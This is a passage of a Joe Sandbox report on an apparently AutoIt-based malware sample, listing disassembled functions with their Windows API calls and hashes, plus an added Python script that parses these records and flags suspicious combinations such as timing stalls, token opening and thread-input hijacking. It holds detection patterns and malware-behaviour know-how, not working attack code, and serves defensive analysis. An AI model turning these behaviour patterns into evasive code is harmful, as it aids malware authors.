                          • Instruction ID: 9e193a1c1cda7520b2f5f50840b15caa3e42a8e8d0a04735bc4a8ad8fe649aea
                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                          • Instruction Fuzzy Hash: 2F01497244824EBBCF125E84CC05CEE3F26BB1C359B599815FA1899131D336C9B2EB81
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 0059B6D1
                          • ScreenToClient.USER32(?,?), ref: 0059B6E9
                          • ScreenToClient.USER32(?,?), ref: 0059B70D
                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0059B728
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClientRectScreen$InvalidateWindow
                          • String ID:
                          • API String ID: 357397906-0
                          • Opcode ID: bd6bbab6a15ce1ee67574362dd2e743979f05d06c9369fca7ffe6ba38fee2e74
                          • Instruction ID: faa64af90d0608e1a5ab4fc3d09bb692d0ab7bd0dcdb4321a3b7fc1cff41c4ad
                          • Opcode Fuzzy Hash: bd6bbab6a15ce1ee67574362dd2e743979f05d06c9369fca7ffe6ba38fee2e74
                          • Instruction Fuzzy Hash: BC1163B9D00209EFDF41CF98D8849EEBBF9FB59310F104156E914E3610D731AA659F90
                          APIs
                          • _memset.LIBCMT ref: 0059BA31
                          • _memset.LIBCMT ref: 0059BA40
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005D7F20,005D7F64), ref: 0059BA6F
                          • CloseHandle.KERNEL32 ref: 0059BA81
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateHandleProcess
                          • String ID:
                          • API String ID: 3277943733-0
                          • Opcode ID: 44d8d9915c49be4f2904f6c37080a0642ca29dd63b63edbb8172048c5e8c43f0
                          • Instruction ID: 336c69d7913a87a9095213c1fc3bbfd46da640fd9ecef896761ddffe63243b79
                          • Opcode Fuzzy Hash: 44d8d9915c49be4f2904f6c37080a0642ca29dd63b63edbb8172048c5e8c43f0
                          • Instruction Fuzzy Hash: 95F0BEB250430A7BF6302765AC0AFBB3F9CEB1D710F000023BA08D52A1E7B15C14D7A8
                          APIs
                          • EnterCriticalSection.KERNEL32(?), ref: 0057700E
                            • Part of subcall function 00577AEC: _memset.LIBCMT ref: 00577B21
                          • _memmove.LIBCMT ref: 00577031
                          • _memset.LIBCMT ref: 0057703E
                          • LeaveCriticalSection.KERNEL32(?), ref: 0057704E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CriticalSection_memset$EnterLeave_memmove
                          • String ID:
                          • API String ID: 48991266-0
                          • Opcode ID: 24c531f67390a34eef7edcbf999c2decd6c13f53875ad5417350761877c3ecfa
                          • Instruction ID: 54f0f7db03d31e0df53c051d0846fa4cc9a61495fa58db5f67ec8f5836426614
                          • Opcode Fuzzy Hash: 24c531f67390a34eef7edcbf999c2decd6c13f53875ad5417350761877c3ecfa
                          • Instruction Fuzzy Hash: 2BF0307A100104ABCF016F55EC89E4ABF29FF85320F08C055FE085E266C771A915DBB4
                          APIs
                            • Part of subcall function 005116CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00511729
                            • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511738
                            • Part of subcall function 005116CF: BeginPath.GDI32(?), ref: 0051174F
                            • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511778
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0059C163
                          • LineTo.GDI32(00000000,?,?), ref: 0059C170
                          • EndPath.GDI32(00000000), ref: 0059C180
                          • StrokePath.GDI32(00000000), ref: 0059C18E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                          • String ID:
                          • API String ID: 1539411459-0
                          • Opcode ID: 2e78fa2d03d8381957c6c3a4c78a1561f74bc96accee139caff8e8cc4e7687c4
                          • Instruction ID: 96463d2bf9e28817e93ad18bcd7f6b7b8695ba2622765928e88eded1a59801c2
                          • Opcode Fuzzy Hash: 2e78fa2d03d8381957c6c3a4c78a1561f74bc96accee139caff8e8cc4e7687c4
                          • Instruction Fuzzy Hash: 26F05E31005259BBDB126F94AC0DFCE3F99BF16310F044141FA11250E1C775555AFBA9
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0056A852
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0056A865
                          • GetCurrentThreadId.KERNEL32 ref: 0056A86C
                          • AttachThreadInput.USER32(00000000), ref: 0056A873
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          • API String ID: 2710830443-0
                          • Opcode ID: fc7e98d7ba5532037bd25951984227722b0a102f692b62f6f31364435e2ef0d8
                          • Instruction ID: 55f467a09684283b6e0a7235bf6f4098309f2c9a18c674dd674c9b09200146d0
                          • Opcode Fuzzy Hash: fc7e98d7ba5532037bd25951984227722b0a102f692b62f6f31364435e2ef0d8
                          • Instruction Fuzzy Hash: 0DE03931101228BAEB211BA29C0CEEB3F1CFF627A1F009020F509A7090C771C995DBA0
                          APIs
                          • GetSysColor.USER32(00000008), ref: 0051260D
                          • SetTextColor.GDI32(?,000000FF), ref: 00512617
                          • SetBkMode.GDI32(?,00000001), ref: 0051262C
                          • GetStockObject.GDI32(00000005), ref: 00512634
                          • GetWindowDC.USER32(?,00000000), ref: 0054C0F4
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0054C101
                          • GetPixel.GDI32(00000000,?,00000000), ref: 0054C11A
                          • GetPixel.GDI32(00000000,00000000,?), ref: 0054C133
                          • GetPixel.GDI32(00000000,?,?), ref: 0054C153
                          • ReleaseDC.USER32(?,00000000), ref: 0054C15E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                          • String ID:
                          • API String ID: 1946975507-0
                          • Opcode ID: 1aa13a3cb49291907e25e537abd4a25175d4d5346eeb7f861eea5d2774c896bc
                          • Instruction ID: e051755c00b39fa92ea2b86ad5c7807ccb4ac4361c140af4992df7a718ee91ae
                          • Opcode Fuzzy Hash: 1aa13a3cb49291907e25e537abd4a25175d4d5346eeb7f861eea5d2774c896bc
                          • Instruction Fuzzy Hash: 26E06D31610244AAEB615F64AC0DBE83F20FB6A336F048366FA69480E187714994EB12
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 0056911C
                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00568CE7), ref: 00569123
                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00568CE7), ref: 00569130
                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00568CE7), ref: 00569137
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CurrentOpenProcessThreadToken
                          • String ID:
                          • API String ID: 3974789173-0
                          • Opcode ID: 93581c3b5518137ef403ad1cd0e77fce2e0522f23881f98c730c1829769e31b6
                          • Instruction ID: a9773e4d55cd89e018471038561ae0de8687436e134c26eea2f2addb33d3c374
                          • Opcode Fuzzy Hash: 93581c3b5518137ef403ad1cd0e77fce2e0522f23881f98c730c1829769e31b6
                          • Instruction Fuzzy Hash: A5E08676611311AFD7605FB0AE0CB573B6CFF66792F104818B245CA0D0E634954ADB51
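Four of the records above are the ones a reviewer pulls out of this function list first: the QueryPerformanceCounter/Sleep pair (consistent with the "stalling execution ending in API Sleep call" signature, though the same shape is also an ordinary calibrated sleep), the _memset/CreateProcessW/CloseHandle launcher (its sixth argument, 0x20, is NORMAL_PRIORITY_CLASS), the SendMessageTimeoutW/AttachThreadInput pair (a WM_NULL probe with SMTO_ABORTIFHUNG and a 0x1388 = 5000 ms timeout, then thread-input attachment, the usual way to force a window to the foreground), and the OpenThreadToken/OpenProcessToken pair (the 0x28 visible on that function's stack equals TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, which would fit a privilege-adjustment prelude, but that is an inference from stack residue, not a resolved argument). The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the report's "APIs" bullet format into per-function records and applies a hand-written triage rule set. The rule labels, the decoder, and the SAMPLE constant (constructed by copying those four records from this page) are mine; Joe Sandbox's own "API ID" key is read but not recomputed.

```python
"""Added example: parse Joe Sandbox "APIs" records and flag API combinations.
Sample text is copied from this report; the rules are hand-written, not Joe Sandbox's."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API bullet, with or without an argument list, with or without the
# "Part of subcall function <addr>:" prefix the report uses for callees.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # stack values as printed; "?" means unresolved
    ref: int                 # address of the call instruction
    subcall: Optional[int]   # callee address when reported as a subcall, else None


@dataclass
class FuncRecord:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""         # Joe Sandbox's own "API ID" similarity key


def parse_records(text: str) -> List[FuncRecord]:
    """Each "APIs" heading opens a record; the later "API ID" line joins it."""
    records: List[FuncRecord] = []
    cur: Optional[FuncRecord] = None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = FuncRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        if s.startswith("• API ID:"):
            cur.api_id = s.split(":", 1)[1].strip()
            continue
        m = API_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            sub = int(m.group("sub"), 16) if m.group("sub") else None
            cur.calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                     int(m.group("ref"), 16), sub))
    return records


# Hand-written rules: every API named in the set must appear in the record.
RULES = [
    ("timing loop: QueryPerformanceCounter + Sleep (calibrated sleep; also used to stall)",
     {"QueryPerformanceCounter", "Sleep"}),
    ("foreground/input hijack: window liveness probe then AttachThreadInput",
     {"SendMessageTimeoutW", "AttachThreadInput"}),
    ("token handle on own process (common prelude to AdjustTokenPrivileges)",
     {"OpenProcessToken"}),
    ("child process launch", {"CreateProcessW"}),
    ("network share / device mapping", {"WNetUseConnectionW"}),
]


def triage(rec: FuncRecord, include_subcalls: bool = False) -> List[str]:
    names = {c.api for c in rec.calls if include_subcalls or c.subcall is None}
    return [label for label, needed in RULES if needed <= names]


def _hex(v: str) -> Optional[int]:
    return None if v == "?" else int(v, 16)


def decode_smto(call: ApiCall) -> dict:
    """SendMessageTimeoutW(hWnd, Msg, wParam, lParam, fuFlags, uTimeout, lpdwResult);
    SMTO_ABORTIFHUNG is 0x0002 and Msg 0 is WM_NULL, the usual liveness probe."""
    flags = _hex(call.args[4])
    return {"msg": _hex(call.args[1]),
            "abort_if_hung": flags is not None and bool(flags & 0x0002),
            "timeout_ms": _hex(call.args[5])}


# Constructed sample: four records copied from the listing on this page.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00570358,?,005713AB,?,00008000), ref: 005717CA
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,00570358,?,005713AB,?,00008000), ref: 005717EF
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00570358,?,005713AB,?,00008000), ref: 005717F9
• Sleep.KERNEL32(?,?,?,?,?,?,?,00570358,?,005713AB,?,00008000), ref: 0057182C
Memory Dump Source
• Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
Similarity
• API ID: CounterPerformanceQuerySleep
APIs
• _memset.LIBCMT ref: 0059BA31
• _memset.LIBCMT ref: 0059BA40
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005D7F20,005D7F64), ref: 0059BA6F
• CloseHandle.KERNEL32 ref: 0059BA81
• API ID: _memset$CloseCreateHandleProcess
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0056A852
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0056A865
• GetCurrentThreadId.KERNEL32 ref: 0056A86C
• AttachThreadInput.USER32(00000000), ref: 0056A873
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
APIs
• GetCurrentThread.KERNEL32 ref: 0056911C
• OpenThreadToken.ADVAPI32(00000000,?,?,?,00568CE7), ref: 00569123
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00568CE7), ref: 00569130
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00568CE7), ref: 00569137
• API ID: CurrentOpenProcessThreadToken
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.api_id or "(no API ID)", "->", triage(rec) or ["nothing flagged"])
```

Subcall lines are kept but excluded from rule matching by default, since the report attributes them to the callee rather than the function being listed; pass include_subcalls=True to match on the full transitive set. The rule set is deliberately small and only demonstrates the mechanism; the wallet-string, WMI and process-injection signatures in the report header come from other sections and are not encoded here.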
                          APIs
                          • GetDesktopWindow.USER32 ref: 005505A9
                          • GetDC.USER32(00000000), ref: 005505B3
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005505D3
                          • ReleaseDC.USER32(?), ref: 005505F4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 359308b4e3100c04f112a0f7193962fd5cfc6d9dba98c2178b766b3a5568d3de
                          • Instruction ID: 1a3f89a7263ce0155c8c18badd7dd469a963682f4dab7983677bd8cc4cd27863
                          • Opcode Fuzzy Hash: 359308b4e3100c04f112a0f7193962fd5cfc6d9dba98c2178b766b3a5568d3de
                          • Instruction Fuzzy Hash: 3DE0E5B5810204EFDB419F60D808A9D7FB1BBAD315F109409F95AA7290DB388595AF50
                          APIs
                          • GetDesktopWindow.USER32 ref: 005505BD
                          • GetDC.USER32(00000000), ref: 005505C7
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005505D3
                          • ReleaseDC.USER32(?), ref: 005505F4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 91b4b45b8245b77a7f43aaa8e12c13188c1da73621c054ab4b3adb441bbfd36d
                          • Instruction ID: c079d700ef91c4b268fc9639f98316c904fe8a94187af665f897a685953bfdd2
                          • Opcode Fuzzy Hash: 91b4b45b8245b77a7f43aaa8e12c13188c1da73621c054ab4b3adb441bbfd36d
                          • Instruction Fuzzy Hash: 80E012B5810204AFDF419FA0D80CA9D7FF1BBAD314F109408F95AA7290DB389596AF50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __itow_s
                          • String ID: xr]$xr]
                          • API String ID: 3653519197-3118715198
                          • Opcode ID: 04cdc1ca3d77ce53ee439b6295b0e1cf7771a7e481326e166917aa1291f381c9
                          • Instruction ID: bddfed675d03a2b50df8cafeda40140a15ae44a9d6715e9e3466100cdb900829
                          • Opcode Fuzzy Hash: 04cdc1ca3d77ce53ee439b6295b0e1cf7771a7e481326e166917aa1291f381c9
                          • Instruction Fuzzy Hash: 04B18F74A0010AAFEB24EF55C895DBABFB9FF98300F148459FD45AB291EB31D981CB50
                          APIs
                          • OleSetContainedObject.OLE32(?,00000001), ref: 0056BE3A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ContainedObject
                          • String ID: AutoIt3GUI$Container
                          • API String ID: 3565006973-3941886329
                          APIs
                            • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • __wcsnicmp.LIBCMT ref: 0057B4DD
                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0057B5A6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                          • String ID: LPT
                          • API String ID: 3222508074-1350329615
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: #VR
                          • API String ID: 4104443479-2899241889
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 0051E01E
                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0051E037
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          • API String ID: 2783356886-2766056989
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: Dt]$Dt]
                          • API String ID: 1473721057-2068989559
                          APIs
                          • _memset.LIBCMT ref: 00582A4E
                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00582A84
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CrackInternet_memset
                          • String ID: |
                          • API String ID: 1413715105-2343686810
                          APIs
                          • DestroyWindow.USER32(?,?,?,?), ref: 00596F04
                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00596F40
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
